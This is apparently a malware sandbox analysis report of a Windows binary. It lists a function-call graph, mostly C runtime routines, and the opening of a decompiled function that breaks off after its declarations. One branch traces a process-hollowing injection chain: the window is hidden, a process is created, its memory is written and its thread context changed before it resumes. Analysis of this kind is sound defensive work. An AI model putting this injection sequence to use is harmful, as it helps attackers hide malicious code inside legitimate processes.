19809->19810 19811 1a2724 19810->19811 19848 1a4cb0 19811->19848 19814 1a275a 19815 1a276c GetConsoleWindow ShowWindow 19814->19815 19816 1a278d 19815->19816 19816->19816 19817 1a27c2 CreateProcessW 19816->19817 19818 1a2a2a 19817->19818 19829 1a2802 19817->19829 19819 1a9545 CatchGuardHandler 5 API calls 19818->19819 19820 1a2a3a 19819->19820 19821 1a2812 VirtualAllocEx 19821->19829 19822 1a284c GetThreadContext 19822->19818 19822->19829 19823 1a2870 ReadProcessMemory VirtualAllocEx 19823->19829 19824 1a28c4 NtWriteVirtualMemory 19825 1a2980 19824->19825 19824->19829 19826 1a29df NtWriteVirtualMemory SetThreadContext 19825->19826 19827 1a2993 NtWriteVirtualMemory 19825->19827 19828 1a2420 19826->19828 19827->19827 19830 1a29d7 19827->19830 19831 1a2a22 ResumeThread 19828->19831 19829->19821 19829->19822 19829->19823 19829->19824 19832 1a296c 19829->19832 19830->19826 19831->19818 19833 1a9545 CatchGuardHandler 5 API calls 19832->19833 19834 1a297c 19833->19834 19836 1a2250 19835->19836 19837 1a9545 CatchGuardHandler 5 API calls 19836->19837 19838 1a2416 19837->19838 19839 1a2cb0 19838->19839 19840 1a3a60 46 API calls 19839->19840 19841 1a2d01 19840->19841 19844 1a2d2d 19841->19844 19858 1a4eb0 19841->19858 19842 1a2130 std::ios_base::_Init 46 API calls 19845 1a2dfc 19842->19845 19844->19842 19846 1a26c8 19845->19846 19847 1a4710 46 API calls 19845->19847 19846->19806 19847->19846 19849 1a4cff 19848->19849 19850 1a3a60 46 API calls 19849->19850 19853 1a4d32 19850->19853 19851 1a2130 std::ios_base::_Init 46 API calls 19854 1a4e6f 19851->19854 19852 1a4d37 19852->19851 19853->19852 19897 1a8a75 19853->19897 19855 1a2729 GetModuleHandleW GetModuleHandleW 19854->19855 19856 1a4710 46 API calls 19854->19856 19855->19814 19856->19855 19859 1a612a std::_Lockit::_Lockit 7 API calls 19858->19859 19860 1a4ed5 19859->19860 19861 1a612a std::_Lockit::_Lockit 7 API calls 19860->19861 19864 1a4f10 19860->19864 19862 1a4eef 19861->19862 19865 1a6182 std::_Lockit::~_Lockit 2 API calls 19862->19865 19863 1a6182 std::_Lockit::~_Lockit 2 API calls 19866 1a4f38 19863->19866 19867 1a4f2f 19864->19867 19869 1a9553 codecvt 16 API calls 19864->19869 19865->19864 19868 1a9545 CatchGuardHandler 5 API calls 19866->19868 19867->19863 19870 1a4f49 19868->19870 19871 1a4f78 19869->19871 19870->19844 19872 1a612a std::_Lockit::_Lockit 7 API calls 19871->19872 19873 1a4fa4 19872->19873 19874 1a4fee 19873->19874 19875 1a50cd 19873->19875 19876 1a657d std::_Locinfo::_Locinfo_ctor 72 API calls 19874->19876 19877 1a62f1 codecvt 46 API calls 19875->19877 19878 1a4ff9 19876->19878 19879 1a50d7 19877->19879 19880 1a65c8 std::_Locinfo::_Locinfo_dtor 71 API calls 19878->19880 19881 1a5010 19880->19881 19882 1a5021 19881->19882 19883 1afb09 ___std_exception_destroy 14 API calls 19881->19883 19884 1a503a 19882->19884 19885 1afb09 ___std_exception_destroy 14 API calls 19882->19885 19883->19882 19886 1a5053 19884->19886 19888 1afb09 ___std_exception_destroy 14 API calls 19884->19888 19885->19884 19887 1a506c 19886->19887 19889 1afb09 ___std_exception_destroy 14 API calls 19886->19889 19890 1a5085 19887->19890 19891 1afb09 ___std_exception_destroy 14 API calls 19887->19891 19888->19886 19889->19887 19892 1a509e 19890->19892 19893 1afb09 ___std_exception_destroy 14 API calls 19890->19893 19891->19890 19894 1a6182 std::_Lockit::~_Lockit 2 API calls 19892->19894 19893->19892 19895 1a50b2 19894->19895 19896 1a644b std::_Facet_Register 16 API calls 19895->19896 19896->19867 19898 1a8a84 19897->19898 19899 1a8a97 codecvt 19897->19899 19898->19852 19899->19898 19900 1b178c 72 API calls 19899->19900 19900->19898 19901 1a3c60 19902 1a3c7c 19901->19902 19903 1a3cd1 19901->19903 19902->19903 19904 1a71dc 73 API calls 19902->19904 19904->19902 19905 1a9667 19910 1aa1e7 SetUnhandledExceptionFilter 19905->19910 19907 1a966c 19911 1b56eb 19907->19911 19909 1a9677 19910->19907 19912 1b5711 19911->19912 19913 1b56f7 19911->19913 19912->19909 19913->19912 19914 1aff41 __strnicoll 14 API calls 19913->19914 19915 1b5701 19914->19915 19916 1afe43 __strnicoll 44 API calls 19915->19916 19917 1b570c 19916->19917 19917->19909 21659 1a889e 21661 1a88b0 codecvt 21659->21661 21660 1a88b6 21661->21660 21662 1a8960 21661->21662 21665 1b1ea4 21661->21665 21662->21660 21664 1b1ea4 __fread_nolock 58 API calls 21662->21664 21664->21660 21668 1b1ec1 21665->21668 21669 1b1ecd ___scrt_is_nonwritable_in_current_image 21668->21669 21670 1b1ebc 21669->21670 21671 1b1ee0 codecvt 21669->21671 21672 1b1f17 21669->21672 21670->21661 21675 1aff41 __strnicoll 14 API calls 21671->21675 21681 1b040d EnterCriticalSection 21672->21681 21674 1b1f21 21682 1b1cbe 21674->21682 21677 1b1efa 21675->21677 21679 1afe43 __strnicoll 44 API calls 21677->21679 21679->21670 21681->21674 21685 1b1ccf codecvt 21682->21685 21694 1b1ceb 21682->21694 21683 1b1cdb 21684 1aff41 __strnicoll 14 API calls 21683->21684 21686 1b1ce0 21684->21686 21685->21683 21691 1b1d2d __fread_nolock 21685->21691 21685->21694 21687 1afe43 __strnicoll 44 API calls 21686->21687 21687->21694 21688 1b1e54 codecvt 21692 1aff41 __strnicoll 14 API calls 21688->21692 21689 1b738b _Ungetc 44 API calls 21689->21691 21690 1b1f5e __fread_nolock 44 API calls 21690->21691 21691->21688 21691->21689 21691->21690 21693 1bba6c __fread_nolock 56 API calls 21691->21693 21691->21694 21692->21686 21693->21691 21695 1b1f56 21694->21695 21698 1b0421 LeaveCriticalSection 21695->21698 21697 1b1f5c 21697->21670 21698->21697 21732 1a6a93 21735 1a6967 21732->21735 21734 1a6a9e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 21736 1a6998 21735->21736 21737 1a69aa 21736->21737 21739 1a6ee3 21736->21739 21737->21734 21740 1a6f0a 21739->21740 21741 1a6eed 21739->21741 21740->21737 21742 1a6bd9 72 API calls 21741->21742 21743 1a6ef9 21742->21743 21745 1b0c2d 21743->21745 21746 1b0c40 _Fputc 21745->21746 21751 1b0b08 21746->21751 21748 1b0c4c 21749 1aeab0 _Fputc 44 API calls 21748->21749 21750 1b0c58 21749->21750 21750->21740 21752 1b0b14 ___scrt_is_nonwritable_in_current_image 21751->21752 21753 1b0b1e 21752->21753 21754 1b0b41 21752->21754 21755 1afdc6 _Fputc 29 API calls 21753->21755 21761 1b0b39 21754->21761 21762 1b040d EnterCriticalSection 21754->21762 21755->21761 21757 1b0b5f 21763 1b0b9f 21757->21763 21759 1b0b6c 21777 1b0b97 21759->21777 21761->21748 21762->21757 21764 1b0bcf 21763->21764 21765 1b0bac 21763->21765 21767 1b0e9a ___scrt_uninitialize_crt 69 API calls 21764->21767 21768 1b0bc7 21764->21768 21766 1afdc6 _Fputc 29 API calls 21765->21766 21766->21768 21769 1b0be7 21767->21769 21768->21759 21780 1b95db 21769->21780 21772 1b738b _Ungetc 44 API calls 21773 1b0bfb 21772->21773 21784 1b9ead 21773->21784 21776 1b63ef ___free_lconv_mon 14 API calls 21776->21768 21826 1b0421 LeaveCriticalSection 21777->21826 21779 1b0b9d 21779->21761 21781 1b95f2 21780->21781 21782 1b0bef 21780->21782 21781->21782 21783 1b63ef ___free_lconv_mon 14 API calls 21781->21783 21782->21772 21783->21782 21785 1b0c02 21784->21785 21786 1b9ed6 21784->21786 21785->21768 21785->21776 21787 1b9f25 21786->21787 21789 1b9efd 21786->21789 21788 1afdc6 _Fputc 29 API calls 21787->21788 21788->21785 21791 1b9e1c 21789->21791 21792 1b9e28 ___scrt_is_nonwritable_in_current_image 21791->21792 21799 1bf69a EnterCriticalSection 21792->21799 21794 1b9e36 21795 1b9e67 21794->21795 21800 1b9f50 21794->21800 21813 1b9ea1 21795->21813 21799->21794 21801 1bf771 __fread_nolock 44 API calls 21800->21801 21802 1b9f60 21801->21802 21803 1b9f66 21802->21803 21805 1b9f98 21802->21805 21806 1bf771 __fread_nolock 44 API calls 21802->21806 21816 1bf6e0 21803->21816 21805->21803 21807 1bf771 __fread_nolock 44 API calls 21805->21807 21808 1b9f8f 21806->21808 21809 1b9fa4 CloseHandle 21807->21809 21810 1bf771 __fread_nolock 44 API calls 21808->21810 21809->21803 21811 1b9fb0 GetLastError 21809->21811 21810->21805 21811->21803 21812 1b9fbe __fread_nolock 21812->21795 21825 1bf6bd LeaveCriticalSection 21813->21825 21815 1b9e8a 21815->21785 21817 1bf6ef 21816->21817 21818 1bf756 21816->21818 21817->21818 21824 1bf719 21817->21824 21819 1aff41 __strnicoll 14 API calls 21818->21819 21820 1bf75b 21819->21820 21821 1aff2e __dosmaperr 14 API calls 21820->21821 21822 1bf746 21821->21822 21822->21812 21823 1bf740 SetStdHandle 21823->21822 21824->21822 21824->21823 21825->21815 21826->21779 19737 1b998f 19738 1b738b _Ungetc 44 API calls 19737->19738 19739 1b999c 19738->19739 19740 1b99a8 19739->19740 19741 1b99f4 19739->19741 19760 1b9d25 19739->19760 19741->19740 19742 1b9a56 19741->19742 19744 1b73c7 44 API calls 19741->19744 19749 1b9b7f 19742->19749 19746 1b9a49 19744->19746 19746->19742 19768 1b9dc0 19746->19768 19750 1b738b _Ungetc 44 API calls 19749->19750 19751 1b9b8e 19750->19751 19752 1b9ba1 19751->19752 19753 1b9c34 19751->19753 19755 1b9bbe 19752->19755 19758 1b9be5 19752->19758 19754 1ba8f8 ___scrt_uninitialize_crt 69 API calls 19753->19754 19757 1b9a67 19754->19757 19756 1ba8f8 ___scrt_uninitialize_crt 69 API calls 19755->19756 19756->19757 19758->19757 19773 1bb3d6 19758->19773 19761 1b9d3b 19760->19761 19762 1b9d3f 19760->19762 19761->19741 19763 1bf771 __fread_nolock 44 API calls 19762->19763 19767 1b9d8e 19762->19767 19764 1b9d60 19763->19764 19765 1b9d68 SetFilePointerEx 19764->19765 19764->19767 19766 1b9d7f GetFileSizeEx 19765->19766 19765->19767 19766->19767 19767->19741 19769 1b6392 __Getctype 14 API calls 19768->19769 19770 1b9ddd 19769->19770 19771 1b63ef ___free_lconv_mon 14 API calls 19770->19771 19772 1b9de7 19771->19772 19772->19742 19774 1bb3ea _Fputc 19773->19774 19779 1bb22d 19774->19779 19777 1aeab0 _Fputc 44 API calls 19778 1bb40e 19777->19778 19778->19757 19782 1bb239 ___scrt_is_nonwritable_in_current_image 19779->19782 19780 1bb241 19780->19777 19781 1bb317 19783 1afdc6 _Fputc 29 API calls 19781->19783 19782->19780 19782->19781 19784 1bb295 19782->19784 19783->19780 19790 1bf69a EnterCriticalSection 19784->19790 19786 1bb29b 19789 1bb2c0 19786->19789 19791 1bb353 19786->19791 19797 1bb30f 19789->19797 19790->19786 19792 1bf771 __fread_nolock 44 API calls 19791->19792 19793 1bb365 19792->19793 19794 1bb381 SetFilePointerEx 19793->19794 19796 1bb36d __fread_nolock 19793->19796 19795 1bb399 GetLastError 19794->19795 19794->19796 19795->19796 19796->19789 19800 1bf6bd LeaveCriticalSection 19797->19800 19799 1bb315 19799->19780 19800->19799 23483 1b4384 23486 1b4050 23483->23486 23487 1b405c ___scrt_is_nonwritable_in_current_image 23486->23487 23494 1aff95 EnterCriticalSection 23487->23494 23489 1b4094 23495 1b40b2 23489->23495 23491 1b4066 23491->23489 23493 1c0808 __Getctype 14 API calls 23491->23493 23493->23491 23494->23491 23498 1affdd LeaveCriticalSection 23495->23498 23497 1b40a0 23498->23497 23676 1a75a8 23677 1a75e6 23676->23677 23678 1a75b1 23676->23678 23678->23677 23681 1b0f71 23678->23681 23680 1a75d9 23682 1b0f83 23681->23682 23686 1b0f8c ___scrt_uninitialize_crt 23681->23686 23683 1b0df5 ___scrt_uninitialize_crt 73 API calls 23682->23683 23684 1b0f89 23683->23684 23684->23680 23685 1b0f9d 23685->23680 23686->23685 23689 1b0d95 23686->23689 23690 1b0da1 ___scrt_is_nonwritable_in_current_image 23689->23690 23697 1b040d EnterCriticalSection 23690->23697 23692 1b0daf 23693 1b0f03 ___scrt_uninitialize_crt 73 API calls 23692->23693 23694 1b0dc0 23693->23694 23698 1b0de9 23694->23698 23697->23692 23701 1b0421 LeaveCriticalSection 23698->23701 23700 1b0dd2 23700->23680 23701->23700 19918 1a10d5 19923 1a7ba9 19918->19923 19924 1a7bb5 __EH_prolog3 19923->19924 19926 1a8284 19924->19926 19935 1a6dad 19926->19935 19928 1a828f 19943 1a884f 19928->19943 19930 1a82a2 19931 1a2130 std::ios_base::_Init 46 API calls 19930->19931 19933 1a82bb 19930->19933 19931->19933 19932 1a82c7 19933->19932 19947 1a90b9 19933->19947 19936 1a6db9 __EH_prolog3 19935->19936 19937 1a2130 std::ios_base::_Init 46 API calls 19936->19937 19938 1a6dea 19937->19938 19939 1a9553 codecvt 16 API calls 19938->19939 19940 1a6df1 19939->19940 19942 1a6e02 std::locale::_Init 19940->19942 19952 1a647d 19940->19952 19942->19928 19944 1a885b __EH_prolog3 19943->19944 20038 1a7b14 19944->20038 19946 1a8873 std::ios_base::_Ios_base_dtor std::locale::_Init 19946->19930 19948 1a612a std::_Lockit::_Lockit 7 API calls 19947->19948 19949 1a90c9 19948->19949 19950 1a6182 std::_Lockit::~_Lockit 2 API calls 19949->19950 19951 1a9107 19950->19951 19951->19932 19953 1a6489 __EH_prolog3 19952->19953 19954 1a612a std::_Lockit::_Lockit 7 API calls 19953->19954 19955 1a6494 19954->19955 19963 1a64c5 19955->19963 19964 1a65e2 19955->19964 19957 1a64a7 19970 1a6605 19957->19970 19958 1a6182 std::_Lockit::~_Lockit 2 API calls 19959 1a6505 std::locale::_Init 19958->19959 19959->19942 19962 1a63d5 _Yarn 15 API calls 19962->19963 19963->19958 19965 1a9553 codecvt 16 API calls 19964->19965 19966 1a65ed 19965->19966 19967 1a6601 19966->19967 19974 1a6311 19966->19974 19967->19957 19971 1a64af 19970->19971 19972 1a6611 19970->19972 19971->19962 19977 1a908a 19972->19977 19975 1a63d5 _Yarn 15 API calls 19974->19975 19976 1a634b 19975->19976 19976->19957 19978 1a909a EncodePointer 19977->19978 19979 1b2db9 19977->19979 19978->19971 19990 1bda8d 19979->19990 19982 1b2dc9 19984 1b2dd3 IsProcessorFeaturePresent 19982->19984 19985 1b2df2 19982->19985 19987 1b2ddf 19984->19987 19986 1b3f0a std::locale::_Setgloballocale 24 API calls 19985->19986 19989 1b2dfc 19986->19989 19988 1afc47 std::locale::_Setgloballocale 8 API calls 19987->19988 19988->19985 19989->19971 20020 1bd9bf 19990->20020 19993 1bdad2 19994 1bdade ___scrt_is_nonwritable_in_current_image 19993->19994 19995 1b797b __strnicoll 14 API calls 19994->19995 20000 1bdb0b std::locale::_Setgloballocale 19994->20000 20003 1bdb05 std::locale::_Setgloballocale 19994->20003 19995->20003 19996 1bdb52 19997 1aff41 __strnicoll 14 API calls 19996->19997 19999 1bdb57 19997->19999 19998 1bdb3c 19998->19982 20001 1afe43 __strnicoll 44 API calls 19999->20001 20002 1bdb7e 20000->20002 20031 1aff95 EnterCriticalSection 20000->20031 20001->19998 20006 1bdcb1 20002->20006 20007 1bdbc0 20002->20007 20017 1bdbef 20002->20017 20003->19996 20003->19998 20003->20000 20008 1bdcbc 20006->20008 20036 1affdd LeaveCriticalSection 20006->20036 20012 1b782a __Getctype 44 API calls 20007->20012 20007->20017 20011 1b3f0a std::locale::_Setgloballocale 24 API calls 20008->20011 20013 1bdcc4 20011->20013 20015 1bdbe4 20012->20015 20014 1b782a __Getctype 44 API calls 20018 1bdc44 20014->20018 20016 1b782a __Getctype 44 API calls 20015->20016 20016->20017 20032 1bdc5e 20017->20032 20018->19998 20019 1b782a __Getctype 44 API calls 20018->20019 20019->19998 20021 1bd9cb ___scrt_is_nonwritable_in_current_image 20020->20021 20026 1aff95 EnterCriticalSection 20021->20026 20023 1bd9d9 20027 1bda17 20023->20027 20026->20023 20030 1affdd LeaveCriticalSection 20027->20030 20029 1b2dbe 20029->19982 20029->19993 20030->20029 20031->20002 20033 1bdc35 20032->20033 20034 1bdc64 20032->20034 20033->19998 20033->20014 20033->20018 20037 1affdd LeaveCriticalSection 20034->20037 20036->20008 20037->20033 20039 1a7b20 __EH_prolog3 20038->20039 20040 1a612a std::_Lockit::_Lockit 7 API calls 20039->20040 20041 1a7b2a 20040->20041 20052 1a1aa0 20041->20052 20043 1a7b93 20045 1a6182 std::_Lockit::~_Lockit 2 API calls 20043->20045 20044 1a7b41 20044->20043 20060 1a7f84 20044->20060 20047 1a7b9b std::locale::_Init 20045->20047 20047->19946 20048 1a7b64 20048->20043 20049 1a7ba3 20048->20049 20070 1a1910 20049->20070 20053 1a1ade 20052->20053 20054 1a1ab6 20052->20054 20056 1a9545 CatchGuardHandler 5 API calls 20053->20056 20055 1a612a std::_Lockit::_Lockit 7 API calls 20054->20055 20058 1a1ac1 20055->20058 20057 1a1aec 20056->20057 20057->20044 20059 1a6182 std::_Lockit::~_Lockit 2 API calls 20058->20059 20059->20053 20061 1a7f90 __EH_prolog3 20060->20061 20062 1a7fe1 std::locale::_Init 20061->20062 20063 1a9553 codecvt 16 API calls 20061->20063 20062->20048 20065 1a7fa9 codecvt 20063->20065 20064 1a7fd0 20064->20062 20088 1a1a00 20064->20088 20065->20064 20076 1a1990 20065->20076 20071 1a191b 20070->20071 20072 1aa3e0 CallUnexpected RaiseException 20071->20072 20073 1a192a 20072->20073 20074 1aa33b ___std_exception_copy 45 API calls 20073->20074 20075 1a1951 20074->20075 20077 1a612a std::_Lockit::_Lockit 7 API calls 20076->20077 20078 1a199a 20077->20078 20079 1a19e8 20078->20079 20080 1a19d8 20078->20080 20082 1a62f1 codecvt 46 API calls 20079->20082 20081 1a657d std::_Locinfo::_Locinfo_ctor 72 API calls 20080->20081 20083 1a19df 20081->20083 20084 1a19f2 20082->20084 20085 1a7c67 20083->20085 20086 1a8d38 __Getctype 45 API calls 20085->20086 20087 1a7c8a 20086->20087 20087->20064 20089 1a65c8 std::_Locinfo::_Locinfo_dtor 71 API calls 20088->20089 20090 1a1a09 20089->20090 20091 1a1a19 20090->20091 20092 1afb09 ___std_exception_destroy 14 API calls 20090->20092 20093 1a1a30 20091->20093 20094 1afb09 ___std_exception_destroy 14 API calls 20091->20094 20092->20091 20095 1a1a47 20093->20095 20096 1afb09 ___std_exception_destroy 14 API calls 20093->20096 20094->20093 20097 1afb09 ___std_exception_destroy 14 API calls 20095->20097 20101 1a1a5e 20095->20101 20096->20095 20097->20101 20098 1afb09 ___std_exception_destroy 14 API calls 20100 1a1a75 20098->20100 20099 1a1a8c 20100->20099 20102 1afb09 ___std_exception_destroy 14 API calls 20100->20102 20101->20098 20101->20100 20102->20099 22518 1a82cd 22522 1a82f0 22518->22522 22526 1a82e9 22518->22526 22519 1a9545 CatchGuardHandler 5 API calls 22520 1a83d3 22519->22520 22523 1a8396 22522->22523 22524 1a8339 22522->22524 22522->22526 22525 1b178c 72 API calls 22523->22525 22523->22526 22524->22526 22527 1a7a65 22524->22527 22525->22526 22526->22519 22530 1b1c8a 22527->22530 22531 1b1c9d _Fputc 22530->22531 22536 1b1b30 22531->22536 22533 1b1cac 22534 1aeab0 _Fputc 44 API calls 22533->22534 22535 1a7a75 22534->22535 22535->22526 22537 1b1b3c ___scrt_is_nonwritable_in_current_image 22536->22537 22538 1b1b69 22537->22538 22539 1b1b45 22537->22539 22550 1b040d EnterCriticalSection 22538->22550 22540 1afdc6 _Fputc 29 API calls 22539->22540 22549 1b1b5e _Fputc 22540->22549 22542 1b1b72 22543 1b1c1d _Fputc 22542->22543 22544 1b738b _Ungetc 44 API calls 22542->22544 22551 1b1c55 22543->22551 22547 1b1b8b 22544->22547 22546 1b1bec 22548 1afdc6 _Fputc 29 API calls 22546->22548 22547->22543 22547->22546 22548->22549 22549->22533 22550->22542 22554 1b0421 LeaveCriticalSection 22551->22554 22553 1b1c5b 22553->22549 22554->22553 22559 1b76f1 22560 1b770c 22559->22560 22561 1b76fc 22559->22561 22565 1b7712 22561->22565 22564 1b63ef ___free_lconv_mon 14 API calls 22564->22560 22566 1b772d 22565->22566 22567 1b7727 22565->22567 22569 1b63ef ___free_lconv_mon 14 API calls 22566->22569 22568 1b63ef ___free_lconv_mon 14 API calls 22567->22568 22568->22566 22570 1b7739 22569->22570 22571 1b63ef ___free_lconv_mon 14 API calls 22570->22571 22572 1b7744 22571->22572 22573 1b63ef ___free_lconv_mon 14 API calls 22572->22573 22574 1b774f 22573->22574 22575 1b63ef ___free_lconv_mon 14 API calls 22574->22575 22576 1b775a 22575->22576 22577 1b63ef ___free_lconv_mon 14 API calls 22576->22577 22578 1b7765 22577->22578 22579 1b63ef ___free_lconv_mon 14 API calls 22578->22579 22580 1b7770 22579->22580 22581 1b63ef ___free_lconv_mon 14 API calls 22580->22581 22582 1b777b 22581->22582 22583 1b63ef ___free_lconv_mon 14 API calls 22582->22583 22584 1b7786 22583->22584 22585 1b63ef ___free_lconv_mon 14 API calls 22584->22585 22586 1b7794 22585->22586 22591 1b753e 22586->22591 22592 1b754a ___scrt_is_nonwritable_in_current_image 22591->22592 22607 1aff95 EnterCriticalSection 22592->22607 22594 1b7554 22597 1b63ef ___free_lconv_mon 14 API calls 22594->22597 22598 1b757e 22594->22598 22597->22598 22608 1b759d 22598->22608 22599 1b75a9 22600 1b75b5 ___scrt_is_nonwritable_in_current_image 22599->22600 22612 1aff95 EnterCriticalSection 22600->22612 22602 1b75bf 22603 1b77df __Getctype 14 API calls 22602->22603 22604 1b75d2 22603->22604 22613 1b75f2 22604->22613 22607->22594 22611 1affdd LeaveCriticalSection 22608->22611 22610 1b758b 22610->22599 22611->22610 22612->22602 22616 1affdd LeaveCriticalSection 22613->22616 22615 1b75e0 22615->22564 22616->22615 22617 1a72f4 22618 1a730f 22617->22618 22620 1a7321 22618->22620 22621 1a677c 22618->22621 22624 1b0a8a 22621->22624 22625 1b0a96 ___scrt_is_nonwritable_in_current_image 22624->22625 22626 1b0a9d 22625->22626 22627 1b0ab4 22625->22627 22628 1aff41 __strnicoll 14 API calls 22626->22628 22637 1b040d EnterCriticalSection 22627->22637 22630 1b0aa2 22628->22630 22632 1afe43 __strnicoll 44 API calls 22630->22632 22631 1b0ac3 22638 1b09d4 22631->22638 22635 1a678e 22632->22635 22634 1b0ad1 22652 1b0b00 22634->22652 22635->22620 22637->22631 22639 1b09ea 22638->22639 22642 1b0a74 _Ungetc 22638->22642 22640 1b0a18 22639->22640 22641 1b9dc0 _Ungetc 14 API calls 22639->22641 22639->22642 22640->22642 22643 1b738b _Ungetc 44 API calls 22640->22643 22641->22640 22642->22634 22644 1b0a2a 22643->22644 22645 1b738b _Ungetc 44 API calls 22644->22645 22651 1b0a4d 22644->22651 22646 1b0a36 22645->22646 22648 1b738b _Ungetc 44 API calls 22646->22648 22646->22651 22649 1b0a42 22648->22649 22650 1b738b _Ungetc 44 API calls 22649->22650 22650->22651 22651->22642 22655 1b08c7 22651->22655 22674 1b0421 LeaveCriticalSection 22652->22674 22654 1b0b06 22654->22635 22656 1b738b _Ungetc 44 API calls 22655->22656 22657 1b08ea 22656->22657 22658 1b738b _Ungetc 44 API calls 22657->22658 22665 1b0913 22657->22665 22660 1b08f8 22658->22660 22661 1b738b _Ungetc 44 API calls 22660->22661 22660->22665 22662 1b0906 22661->22662 22663 1b738b _Ungetc 44 API calls 22662->22663 22663->22665 22664 1b094d 22666 1a9545 CatchGuardHandler 5 API calls 22664->22666 22665->22664 22668 1b71e7 22665->22668 22667 1b09cb 22666->22667 22667->22642 22669 1b71fa _Fputc 22668->22669 22670 1b707d _Fputc 46 API calls 22669->22670 22671 1b720f 22670->22671 22672 1aeab0 _Fputc 44 API calls 22671->22672 22673 1b721c 22672->22673 22673->22664 22674->22654 23930 1a75ed 23931 1a75f9 __EH_prolog3_GS 23930->23931 23933 1a7648 23931->23933 23937 1a7610 23931->23937 23941 1a7662 23931->23941 23932 1a9a6a 5 API calls 23934 1a772c 23932->23934 23944 1a6697 23933->23944 23936 1b100d 46 API calls 23936->23941 23937->23932 23938 1a7386 46 API calls 23938->23941 23939 1a2fb0 44 API calls 23939->23937 23940 1a7711 23940->23939 23941->23936 23941->23938 23941->23940 23943 1a774c 23941->23943 23942 1b1abd 46 API calls 23942->23943 23943->23940 23943->23942 23947 1b05a5 23944->23947 23948 1b05b1 ___scrt_is_nonwritable_in_current_image 23947->23948 23949 1b05b8 23948->23949 23950 1b05cf 23948->23950 23951 1aff41 __strnicoll 14 API calls 23949->23951 23960 1b040d EnterCriticalSection 23950->23960 23953 1b05bd 23951->23953 23955 1afe43 __strnicoll 44 API calls 23953->23955 23954 1b05db 23961 1b0435 23954->23961 23957 1a66a2 23955->23957 23957->23937 23958 1b05e6 23995 1b0614 23958->23995 23960->23954 23962 1b04b8 23961->23962 23963 1b0452 23961->23963 23965 1b738b _Ungetc 44 API calls 23962->23965 23969 1b04af 23962->23969 23964 1b738b _Ungetc 44 API calls 23963->23964 23967 1b0458 23964->23967 23968 1b04cd 23965->23968 23966 1b047b 23966->23962 23981 1b0496 23966->23981 23967->23966 23970 1b738b _Ungetc 44 API calls 23967->23970 23971 1b04f0 23968->23971 23973 1b738b _Ungetc 44 API calls 23968->23973 23969->23958 23972 1b0464 23970->23972 23971->23969 23974 1b1002 44 API calls 23971->23974 23972->23966 23977 1b738b _Ungetc 44 API calls 23972->23977 23975 1b04d9 23973->23975 23976 1b0510 23974->23976 23975->23971 23980 1b738b _Ungetc 44 API calls 23975->23980 23976->23969 23982 1b1fdf __Getctype 44 API calls 23976->23982 23979 1b0470 23977->23979 23983 1b738b _Ungetc 44 API calls 23979->23983 23984 1b04e5 23980->23984 23981->23969 23998 1b1002 23981->23998 23985 1b0528 23982->23985 23983->23966 23986 1b738b _Ungetc 44 API calls 23984->23986 23987 1b0552 23985->23987 23988 1b1002 44 API calls 23985->23988 23986->23971 24005 1b7354 23987->24005 23990 1b0539 23988->23990 23990->23987 23992 1b053f 23990->23992 23994 1b1abd 46 API calls 23992->23994 23993 1aff41 __strnicoll 14 API calls 23993->23969 23994->23969 24030 1b0421 LeaveCriticalSection 23995->24030 23997 1b061a 23997->23957 23999 1b0fc6 23998->23999 24000 1b0fe7 __fread_nolock 23999->24000 24001 1aff41 __strnicoll 14 API calls 23999->24001 24000->23981 24002 1b0fd7 24001->24002 24003 1afe43 __strnicoll 44 API calls 24002->24003 24004 1b0fe2 24003->24004 24004->23981 24006 1b7367 _Fputc 24005->24006 24011 1b7221 24006->24011 24009 1aeab0 _Fputc 44 API calls 24010 1b0566 24009->24010 24010->23969 24010->23993 24013 1b7235 24011->24013 24021 1b7245 24011->24021 24012 1b726a 24015 1b727b 24012->24015 24016 1b729e 24012->24016 24013->24012 24014 1af970 _Fputc 44 API calls 24013->24014 24013->24021 24014->24012 24023 1c387f 24015->24023 24018 1b731a 24016->24018 24019 1b72c6 24016->24019 24016->24021 24020 1bdcc5 __strnicoll MultiByteToWideChar 24018->24020 24019->24021 24022 1bdcc5 __strnicoll MultiByteToWideChar 24019->24022 24020->24021 24021->24009 24022->24021 24026 1c5453 24023->24026 24029 1c547e _Fputc 24026->24029 24027 1a9545 CatchGuardHandler 5 API calls 24028 1c389a 24027->24028 24028->24021 24029->24027 24030->23997

                                                Control-flow Graph

                                                C-Code - Quality: 55%
                                                			E001A2660(void* __ecx, void* __eflags) {
                                                				signed int _v8;
                                                				void* _v28;
                                                				void* _v100;
                                                				void* _v544;
                                                				void* _v552;
                                                				void* _v584;
                                                				struct _STARTUPINFOW _v616;
                                                				void _v624;
                                                				void* _v628;
                                                				void* _v632;
                                                				void** _v644;
                                                				char _v648;
                                                				long* _v652;
                                                				void* _v656;
                                                				void* _v660;
                                                				intOrPtr _v664;
                                                				void* _v668;
                                                				char _v672;
                                                				CONTEXT* _v676;
                                                				intOrPtr _v680;
                                                				void* _v684;
                                                				void* _v688;
                                                				intOrPtr _v692;
                                                				intOrPtr _v696;
                                                				intOrPtr _v700;
                                                				void* _v704;
                                                				CONTEXT* _v708;
                                                				intOrPtr _v716;
                                                				void* _v720;
                                                				void* _v724;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t91;
                                                				intOrPtr* _t97;
                                                				signed short _t98;
                                                				CONTEXT* _t103;
                                                				void* _t105;
                                                				void* _t107;
                                                				struct HWND__* _t108;
                                                				void* _t110;
                                                				void _t114;
                                                				WCHAR* _t118;
                                                				void* _t121;
                                                				void* _t123;
                                                				void* _t125;
                                                				intOrPtr _t130;
                                                				void* _t132;
                                                				void _t155;
                                                				void* _t159;
                                                				intOrPtr* _t164;
                                                				void* _t166;
                                                				void* _t167;
                                                				intOrPtr* _t171;
                                                				intOrPtr* _t174;
                                                				void** _t191;
                                                				intOrPtr _t197;
                                                				void* _t198;
                                                				intOrPtr _t213;
                                                				void* _t215;
                                                				signed int _t216;
                                                				void* _t217;
                                                				void* _t219;
                                                				void* _t222;
                                                				void* _t223;
                                                				void* _t224;
                                                				void* _t226;
                                                				void* _t229;
                                                				void* _t230;
                                                				struct HINSTANCE__* _t233;
                                                				void* _t235;
                                                				CONTEXT* _t237;
                                                				void* _t238;
                                                				void* _t240;
                                                				signed int _t241;
                                                				signed int _t243;
                                                				void* _t244;
                                                				signed int _t245;
                                                
                                                				_t167 = __ecx;
                                                				_t243 = (_t241 & 0xfffffff0) - 0x2a8;
                                                				_t91 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t91 ^ _t243;
                                                				asm("xorps xmm0, xmm0");
